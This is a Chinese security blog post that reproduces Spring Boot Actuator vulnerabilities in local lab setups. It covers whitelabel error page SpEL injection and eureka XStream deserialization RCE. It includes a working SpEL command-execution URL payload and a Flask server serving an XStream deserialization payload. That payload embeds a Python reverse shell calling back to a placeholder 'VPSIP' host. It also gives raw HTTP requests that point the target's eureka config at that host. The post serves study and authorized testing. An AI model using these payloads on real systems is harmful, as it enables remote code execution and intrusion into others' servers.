<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Spring Boot Actuator 漏洞复现合集 | Zeo's Security Lab</title><meta name="author" content="Zeo"><meta name="copyright" content="Zeo"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="ffffff"><meta name="description" content="前言Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的，这种未授权在某些情况下是可以达到RCE的效果的，所以还有有一定价值的，下面就是对这一系列漏洞复现。 基本上就是参考这篇文章的做的复现： LandGrey&#x2F;SpringBootVulExploit: SpringBoot 相关漏洞学习资料，利用方法和技巧合集，黑盒安全评估 check list">
<meta property="og:type" content="article">
<meta property="og:title" content="Spring Boot Actuator 漏洞复现合集">
<meta property="og:url" content="https://godzeo.github.io/2022/02/09/Spring%20Boot%20Actuator%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/index.html">
<meta property="og:site_name" content="Zeo&#39;s Security Lab">
<meta property="og:description" content="前言Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的，这种未授权在某些情况下是可以达到RCE的效果的，所以还有有一定价值的，下面就是对这一系列漏洞复现。 基本上就是参考这篇文章的做的复现： LandGrey&#x2F;SpringBootVulExploit: SpringBoot 相关漏洞学习资料，利用方法和技巧合集，黑盒安全评估 check list">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp">
<meta property="article:published_time" content="2022-02-09T03:00:57.000Z">
<meta property="article:modified_time" content="2022-11-28T12:25:22.941Z">
<meta property="article:author" content="Zeo">
<meta property="article:tag" content="java 后端 web安全 漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp"><link rel="shortcut icon" href="/img/WX20211124-162855.png"><link rel="canonical" href="https://godzeo.github.io/2022/02/09/Spring%20Boot%20Actuator%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'Spring Boot Actuator 漏洞复现合集',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-11-28 20:25:22'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', 'ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Zeo's Security Lab" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231013354.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">46</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">9</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Zeo's Security Lab</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">Spring Boot Actuator 漏洞复现合集</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-02-09T03:00:57.000Z" title="发表于 2022-02-09 11:00:57">2022-02-09</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-11-28T12:25:22.941Z" title="更新于 2022-11-28 20:25:22">2022-11-28</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/spring-boot/">spring boot</a></span></div><div class="meta-secondline"></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><span id="more"></span>

<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的，这种未授权在某些情况下是可以达到RCE的效果的，所以还有有一定价值的，下面就是对这一系列漏洞复现。</p>
<p>基本上就是参考这篇文章的做的复现：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/LandGrey/SpringBootVulExploit/">LandGrey&#x2F;SpringBootVulExploit: SpringBoot 相关漏洞学习资料，利用方法和技巧合集，黑盒安全评估 check list (github.com)</a></p>
<h1 id="Spring-Boot-Actuator简介"><a href="#Spring-Boot-Actuator简介" class="headerlink" title="Spring Boot Actuator简介"></a>Spring Boot Actuator简介</h1><p>Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问，大多数时候我们使用基于HTTP的Actuator端点，因为它们很容易通过浏览器、CURL命令、shell脚本等方式访问。</p>
<p>一些有用的执行器端点是：</p>
<p><strong>Spring Boot Actuator未授权访问</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">/dump - 显示线程转储（包括堆栈跟踪）</span><br><span class="line">/autoconfig - 显示自动配置报告</span><br><span class="line">/configprops - 显示配置属性</span><br><span class="line">/trace - 显示最后几条HTTP消息（可能包含会话标识符）</span><br><span class="line">/logfile - 输出日志文件的内容</span><br><span class="line">/shutdown - 关闭应用程序</span><br><span class="line">/info - 显示应用信息</span><br><span class="line">/metrics - 显示当前应用的’指标’信息</span><br><span class="line">/health - 显示应用程序的健康指标</span><br><span class="line">/beans - 显示Spring Beans的完整列表</span><br><span class="line">/mappings - 显示所有MVC控制器映射</span><br><span class="line">/env - 提供对配置环境的访问</span><br><span class="line">/restart - 重新启动应用程序</span><br></pre></td></tr></table></figure>

<ul>
<li>Spring Boot Actuator 1.x 版本默认内置路由的起始路径为 <code>/</code> ，2.x 版本则统一以 <code>/actuator</code> 为起始路径</li>
<li>Spring Boot Actuator 默认的内置路由名字，如 <code>/env</code> 有时候也会被程序员修改，比如修改成 <code>/appenv</code></li>
</ul>
<h1 id="whitelabel-error-page-SpEL-RCE"><a href="#whitelabel-error-page-SpEL-RCE" class="headerlink" title="whitelabel error page SpEL RCE"></a>whitelabel error page SpEL RCE</h1><h2 id="1-影响版本："><a href="#1-影响版本：" class="headerlink" title="1 影响版本："></a>1 影响版本：</h2><ul>
<li>影响版本：<br>1.1.0-1.1.12<br>1.2.0-1.2.7<br>1.3.0</li>
</ul>
<h2 id="2-漏洞原理："><a href="#2-漏洞原理：" class="headerlink" title="2 漏洞原理："></a>2 漏洞原理：</h2><ul>
<li>利用条件是使用了springboot的默认错误页(Whitelabel Error Page)</li>
</ul>
<ol>
<li><p>spring boot 处理参数值出错，流程进入 <code>org.springframework.util.PropertyPlaceholderHelper</code> 类中</p>
</li>
<li><p>此时 URL 中的参数值会用 <code>parseStringValue</code> 方法进行递归解析</p>
</li>
<li><p>其中 <code>$&#123;&#125;</code> 包围的内容都会被 <code>org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration</code> 类的 <code>resolvePlaceholder</code> 方法当作 SpEL 表达式被解析执行，造成 RCE 漏洞</p>
</li>
</ol>
<h2 id="3-验证检测方法："><a href="#3-验证检测方法：" class="headerlink" title="3 验证检测方法："></a>3 验证检测方法：</h2><h3 id="步骤一：找到一个正常传参处"><a href="#步骤一：找到一个正常传参处" class="headerlink" title="步骤一：找到一个正常传参处"></a>步骤一：找到一个正常传参处</h3><p>比如发现访问 <code>/article</code> ，页面会报状态码为 500 的错误： <code>Whitelabel Error Page</code></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/0c9258aa7f1261a4236914e144e0a6cd.png" alt="image-20211125105128725"></p>
<h3 id="步骤二：执行-SpEL-表达式"><a href="#步骤二：执行-SpEL-表达式" class="headerlink" title="步骤二：执行 SpEL 表达式"></a>步骤二：执行 SpEL 表达式</h3><p>输入 <code>/article?id=$&#123;7*7&#125;</code> ，如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上，那么基本可以确定目标存在 SpEL 表达式注入漏洞。</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/4223dd3ce45d4bed0e1b1ab7ac9409a4.png" alt="image-20211125104910358"></p>
<h2 id="4-利用方法："><a href="#4-利用方法：" class="headerlink" title="4 利用方法："></a>4 利用方法：</h2><p>由字符串格式转换成 <code>0x**</code> java 字节形式，方便执行任意代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># author: Zeo</span></span><br><span class="line"><span class="comment"># python: 3.7 </span></span><br><span class="line"><span class="comment"># software: PyCharm</span></span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">文件说明：转换字节码</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"></span><br><span class="line">result = <span class="string">&quot;&quot;</span></span><br><span class="line">target = <span class="string">&#x27;open -a Calculator&#x27;</span></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> target:</span><br><span class="line">    result += <span class="built_in">hex</span>(<span class="built_in">ord</span>(x)) + <span class="string">&quot;,&quot;</span></span><br><span class="line"><span class="built_in">print</span>(result.rstrip(<span class="string">&#x27;,&#x27;</span>))</span><br></pre></td></tr></table></figure>

<p>正常访问：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:9091/article?id=66</span><br></pre></td></tr></table></figure>

<p>执行 <code>open \-a Calculator</code> 命令:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:8080/article?id=$&#123;T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]&#123;0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72&#125;))&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/b8fa78bd9991c97caa32d01dee54bb31.png" alt="image-20211125105005884"></p>
<h4 id="漏洞环境搭建："><a href="#漏洞环境搭建：" class="headerlink" title="漏洞环境搭建："></a>漏洞环境搭建：</h4><p><a target="_blank" rel="noopener" href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce">https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce</a></p>
<h1 id="eureka-xstream-deserialization-RCE"><a href="#eureka-xstream-deserialization-RCE" class="headerlink" title="eureka xstream deserialization RCE"></a>eureka xstream deserialization RCE</h1><h2 id="1-利用条件："><a href="#1-利用条件：" class="headerlink" title="1 利用条件："></a>1 利用条件：</h2><ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/refresh</code> 接口刷新配置（存在 <code>spring-boot-starter-actuator</code> 依赖）</li>
<li>目标使用的 <code>eureka-client</code> &lt; 1.8.7（通常包含在 <code>spring-cloud-starter-netflix-eureka-client</code> 依赖中）</li>
<li>目标可以请求攻击者的 HTTP 服务器（请求可出外网）</li>
</ul>
<h2 id="2-漏洞原理：-1"><a href="#2-漏洞原理：-1" class="headerlink" title="2 漏洞原理："></a>2 漏洞原理：</h2><ol>
<li>eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址</li>
<li>refresh 触发目标机器请求远程 URL，提前架设的 fake eureka server 就会返回恶意的 payload</li>
<li>目标机器相关依赖解析 payload，触发 XStream 反序列化，造成 RCE 漏洞</li>
</ol>
<h2 id="3-漏洞环境："><a href="#3-漏洞环境：" class="headerlink" title="3 漏洞环境："></a>3 漏洞环境：</h2><p><a target="_blank" rel="noopener" href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-eureka-xstream-rce">repository&#x2F;springboot-eureka-xstream-rce</a></p>
<h2 id="4-漏洞复现"><a href="#4-漏洞复现" class="headerlink" title="4 漏洞复现"></a>4 漏洞复现</h2><h3 id="正常访问："><a href="#正常访问：" class="headerlink" title="正常访问："></a>正常访问：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:9093/env</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/9947036f210271d066c9dd27b6059d4e.png" alt="image-20211202103040953"></p>
<h3 id="发现存在所需的依赖"><a href="#发现存在所需的依赖" class="headerlink" title="发现存在所需的依赖"></a>发现存在所需的依赖</h3><p><img src="https://img-blog.csdnimg.cn/img_convert/03e55e12e2c7e93f70eeaa40af697065.png"></p>
<h3 id="nc-监听端口，等待反弹-shell"><a href="#nc-监听端口，等待反弹-shell" class="headerlink" title="nc 监听端口，等待反弹 shell"></a>nc 监听端口，等待反弹 shell</h3><p><img src="https://img-blog.csdnimg.cn/img_convert/50d23e70c1807b3ad3807adf9540c49d.png" alt="image-20211202104656362"></p>
<h3 id="架设响应恶意-XStream-payload-的网站"><a href="#架设响应恶意-XStream-payload-的网站" class="headerlink" title="架设响应恶意 XStream payload 的网站"></a>架设响应恶意 XStream payload 的网站</h3><p>运行恶意脚本，并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"><span class="comment"># -**- Author: LandGrey -**-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, Response</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, defaults=&#123;<span class="string">&#x27;path&#x27;</span>: <span class="string">&#x27;&#x27;</span>&#125;</span>)</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&lt;path:path&gt;&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">catch_all</span>(<span class="params">path</span>):</span><br><span class="line">    xml = <span class="string">&quot;&quot;&quot;&lt;linked-hash-set&gt;</span></span><br><span class="line"><span class="string">  &lt;jdk.nashorn.internal.objects.NativeString&gt;</span></span><br><span class="line"><span class="string">    &lt;value class=&quot;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&quot;&gt;</span></span><br><span class="line"><span class="string">      &lt;dataHandler&gt;</span></span><br><span class="line"><span class="string">        &lt;dataSource class=&quot;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource&quot;&gt;</span></span><br><span class="line"><span class="string">          &lt;is class=&quot;javax.crypto.CipherInputStream&quot;&gt;</span></span><br><span class="line"><span class="string">            &lt;cipher class=&quot;javax.crypto.NullCipher&quot;&gt;</span></span><br><span class="line"><span class="string">              &lt;serviceIterator class=&quot;javax.imageio.spi.FilterIterator&quot;&gt;</span></span><br><span class="line"><span class="string">                &lt;iter class=&quot;javax.imageio.spi.FilterIterator&quot;&gt;</span></span><br><span class="line"><span class="string">                  &lt;iter class=&quot;java.util.Collections$EmptyIterator&quot;/&gt;</span></span><br><span class="line"><span class="string">                  &lt;next class=&quot;java.lang.ProcessBuilder&quot;&gt;</span></span><br><span class="line"><span class="string">                    &lt;command&gt;</span></span><br><span class="line"><span class="string">                       &lt;string&gt;/bin/bash&lt;/string&gt;</span></span><br><span class="line"><span class="string">                       &lt;string&gt;-c&lt;/string&gt;</span></span><br><span class="line"><span class="string">                       &lt;string&gt;python -c &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;VPSIP&quot;,4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/bash&quot;,&quot;-i&quot;]);&#x27;&lt;/string&gt;</span></span><br><span class="line"><span class="string">                    &lt;/command&gt;</span></span><br><span class="line"><span class="string">                    &lt;redirectErrorStream&gt;false&lt;/redirectErrorStream&gt;</span></span><br><span class="line"><span class="string">                  &lt;/next&gt;</span></span><br><span class="line"><span class="string">                &lt;/iter&gt;</span></span><br><span class="line"><span class="string">                &lt;filter class=&quot;javax.imageio.ImageIO$ContainsFilter&quot;&gt;</span></span><br><span class="line"><span class="string">                  &lt;method&gt;</span></span><br><span class="line"><span class="string">                    &lt;class&gt;java.lang.ProcessBuilder&lt;/class&gt;</span></span><br><span class="line"><span class="string">                    &lt;name&gt;start&lt;/name&gt;</span></span><br><span class="line"><span class="string">                    &lt;parameter-types/&gt;</span></span><br><span class="line"><span class="string">                  &lt;/method&gt;</span></span><br><span class="line"><span class="string">                  &lt;name&gt;foo&lt;/name&gt;</span></span><br><span class="line"><span class="string">                &lt;/filter&gt;</span></span><br><span class="line"><span class="string">                &lt;next class=&quot;string&quot;&gt;foo&lt;/next&gt;</span></span><br><span class="line"><span class="string">              &lt;/serviceIterator&gt;</span></span><br><span class="line"><span class="string">              &lt;lock/&gt;</span></span><br><span class="line"><span class="string">            &lt;/cipher&gt;</span></span><br><span class="line"><span class="string">            &lt;input class=&quot;java.lang.ProcessBuilder$NullInputStream&quot;/&gt;</span></span><br><span class="line"><span class="string">            &lt;ibuffer&gt;&lt;/ibuffer&gt;</span></span><br><span class="line"><span class="string">          &lt;/is&gt;</span></span><br><span class="line"><span class="string">        &lt;/dataSource&gt;</span></span><br><span class="line"><span class="string">      &lt;/dataHandler&gt;</span></span><br><span class="line"><span class="string">    &lt;/value&gt;</span></span><br><span class="line"><span class="string">  &lt;/jdk.nashorn.internal.objects.NativeString&gt;</span></span><br><span class="line"><span class="string">&lt;/linked-hash-set&gt;&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">return</span> Response(xml, mimetype=<span class="string">&#x27;application/xml&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">777</span>)</span><br></pre></td></tr></table></figure>

<h3 id="发送设置-eureka-client-serviceUrl-defaultZone-属性"><a href="#发送设置-eureka-client-serviceUrl-defaultZone-属性" class="headerlink" title="发送设置 eureka.client.serviceUrl.defaultZone 属性"></a>发送设置 eureka.client.serviceUrl.defaultZone 属性</h3><p><img src="https://img-blog.csdnimg.cn/img_convert/68cb1b24da67ee6a682a2dd49a35e6c9.png" alt="image-20211202111957169"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">POST /env HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:9093</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-Site: none</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 65</span><br><span class="line"></span><br><span class="line">eureka.client.serviceUrl.defaultZone=http://VPSIP:777/example</span><br></pre></td></tr></table></figure>

<h3 id="刷新配置"><a href="#刷新配置" class="headerlink" title="刷新配置"></a>刷新配置</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /refresh HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:9093</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-Site: none</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 0</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/e1bdb9ef5995b09ff43b32fcf50fd8de.png" alt="image-20211202112136839"></p>
<p>成功反弹shell</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/e3b12d2e6ff560f98572b888eda230fc.png" alt="image-20211202111923596"></p>
<h2 id="5-利用方法："><a href="#5-利用方法：" class="headerlink" title="5 利用方法："></a>5 利用方法：</h2><h5 id="步骤一：架设响应恶意-XStream-payload-的网站"><a href="#步骤一：架设响应恶意-XStream-payload-的网站" class="headerlink" title="步骤一：架设响应恶意 XStream payload 的网站"></a>步骤一：架设响应恶意 XStream payload 的网站</h5><p>提供一个依赖 Flask 并符合要求的 <a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-xstream-rce.py">python 脚本示例</a>，作用是利用目标 Linux 机器上自带的 python 来反弹shell。</p>
